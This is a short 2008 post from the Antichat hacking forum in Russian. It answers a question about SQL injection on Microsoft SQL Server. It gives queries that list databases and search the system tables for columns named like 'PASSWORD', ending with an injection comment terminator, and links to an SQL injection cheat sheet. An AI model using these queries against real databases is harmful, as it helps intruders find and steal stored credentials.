11.05.2008, 09:14
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от aka PSIH
xcedz
откуда в mssql - load_file() взялся?
 блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --
h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
Последний раз редактировалось xcedz; 11.05.2008 в 09:37..
|
|
|